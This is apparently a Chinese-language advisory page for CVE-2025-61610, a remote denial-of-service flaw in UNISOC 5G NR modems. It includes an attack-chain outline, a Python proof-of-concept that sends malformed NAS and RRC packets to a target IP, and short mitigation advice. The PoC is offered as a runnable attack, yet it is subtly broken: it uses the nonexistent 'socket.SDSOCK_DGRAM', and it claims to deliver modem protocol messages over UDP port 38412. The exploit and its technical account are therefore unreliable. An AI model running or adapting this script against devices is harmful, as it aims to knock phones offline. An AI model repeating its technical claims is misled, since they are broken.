CVE-2025-61610: 紫光展锐NR调制解调器输入验证不当导致远程拒绝服务

漏洞信息

漏洞编号

CVE-2025-61610

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

紫光展锐(UNISOC) NR调制解调器

漏洞概述

CVE-2025-61610是紫光展锐NR(5G)调制解调器中的一个安全漏洞。该漏洞源于不正确的输入验证机制，攻击者可以通过网络发送特制的恶意数据包到目标设备的NR调制解调器组件。由于缺乏有效的输入验证，恶意数据可能导致系统崩溃，从而造成远程拒绝服务(DoS)攻击。此漏洞的特别之处在于攻击者无需任何特殊权限或用户交互即可实施攻击，只要能够与目标设备的NR调制解调器建立网络连接即可。这使得该漏洞具有较高的可利用性和严重的潜在影响，特别是对于依赖紫光展锐5G调制解调器的物联网设备、智能手机和其他移动终端。攻击成功后将导致设备通信能力完全丧失，影响正常业务运行。

技术细节

该漏洞存在于紫光展锐NR调制解调器的输入验证模块中。当调制解调器接收到来自网络的NR协议数据包时，缺少对特定字段的边界检查和格式验证。攻击者可以构造包含异常参数值或畸形数据结构的NR消息，触发调制解调器软件栈中的内存处理错误。具体而言，当接收到的数据包含超长字段、非法数值或格式错误时，调制解调器的协议解析器未能正确处理这些异常情况，导致内存访问越界或断言失败，最终引发系统崩溃。由于该漏洞位于基带处理器层面，崩溃将影响整个调制解调器功能，造成5G连接中断。攻击者可通过发送精心设计的NAS(非接入层)消息或RRC(无线资源控制)消息来触发此漏洞，无需认证即可远程利用。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备使用的紫光展锐NR调制解调器，确认设备支持5G NR连接，并探测网络可达性

STEP 2

步骤2: 构造攻击载荷

攻击者构造包含无效字段、超长数据或格式错误的畸形NR协议消息(NAS或RRC消息)，绕过输入验证机制

STEP 3

步骤3: 发送恶意数据包

通过UDP端口38412或其他NR协议端口向目标调制解调器发送特制的恶意数据包，无需任何认证

STEP 4

步骤4: 触发漏洞

调制解调器接收到畸形数据后，由于输入验证不当，协议解析器处理异常数据导致内存访问错误或断言失败

STEP 5

步骤5: 系统崩溃

调制解调器基带处理器发生致命错误导致系统崩溃，5G连接中断，设备丧失通信能力

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61610 PoC - NR Modem Denial of Service
# Target: UNISOC NR Modem
# Attack Type: Remote DoS via malformed NR protocol messages

import socket
import struct
import random

def create_malformed_nas_message():
    """Create a malformed NAS message to trigger input validation bug"""
    # NAS Message Header
    nas_header = bytes([
        0x00, 0x00,  # Extended protocol discriminator
        0x00,        # Security header type
        0x00,        # Message type
    ])
    
    # Malformed IEI with invalid length
    malformed_ie = bytes([
        0xFF,        # Invalid IEI
        0xFF, 0xFF,  # Invalid length (exceeds maximum)
    ])
    
    # Padding with invalid data
    padding = bytes([random.randint(0, 255) for _ in range(100)])
    
    return nas_header + malformed_ie + padding

def create_malformed_rrc_message():
    """Create a malformed RRC message"""
    rrc_header = bytes([
        0x00,        # RRC message type
        0xFF,        # Invalid frequency
        0xFF, 0xFF,  # Invalid PCI
    ])
    
    # Add oversized field
    oversized_field = bytes([0x00] * 1000)
    
    return rrc_header + oversized_field

def send_dos_packet(target_ip, target_port=38412):
    """Send DoS packet to NR modem"""
    sock = socket.socket(socket.AF_INET, socket.SDSOCK_DGRAM)
    
    # Try NAS message
    nas_payload = create_malformed_nas_message()
    sock.sendto(nas_payload, (target_ip, target_port))
    
    # Try RRC message
    rrc_payload = create_malformed_rrc_message()
    sock.sendto(rrc_payload, (target_ip, target_port))
    
    sock.close()
    print(f"[+] Malformed packets sent to {target_ip}:{target_port}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] CVE-2025-61610 PoC - Targeting {target}")
    send_dos_packet(target)

影响范围

紫光展锐NR调制解调器调制解调器固件 < 修复版本

防御指南

临时缓解措施

在网络边界配置严格的访问控制策略，限制对NR调制解调器端口的访问；部署DDoS防护设备过滤异常NR协议消息；监控网络流量中的异常模式并及时告警；对于关键设备，考虑启用备用通信链路以确保业务连续性。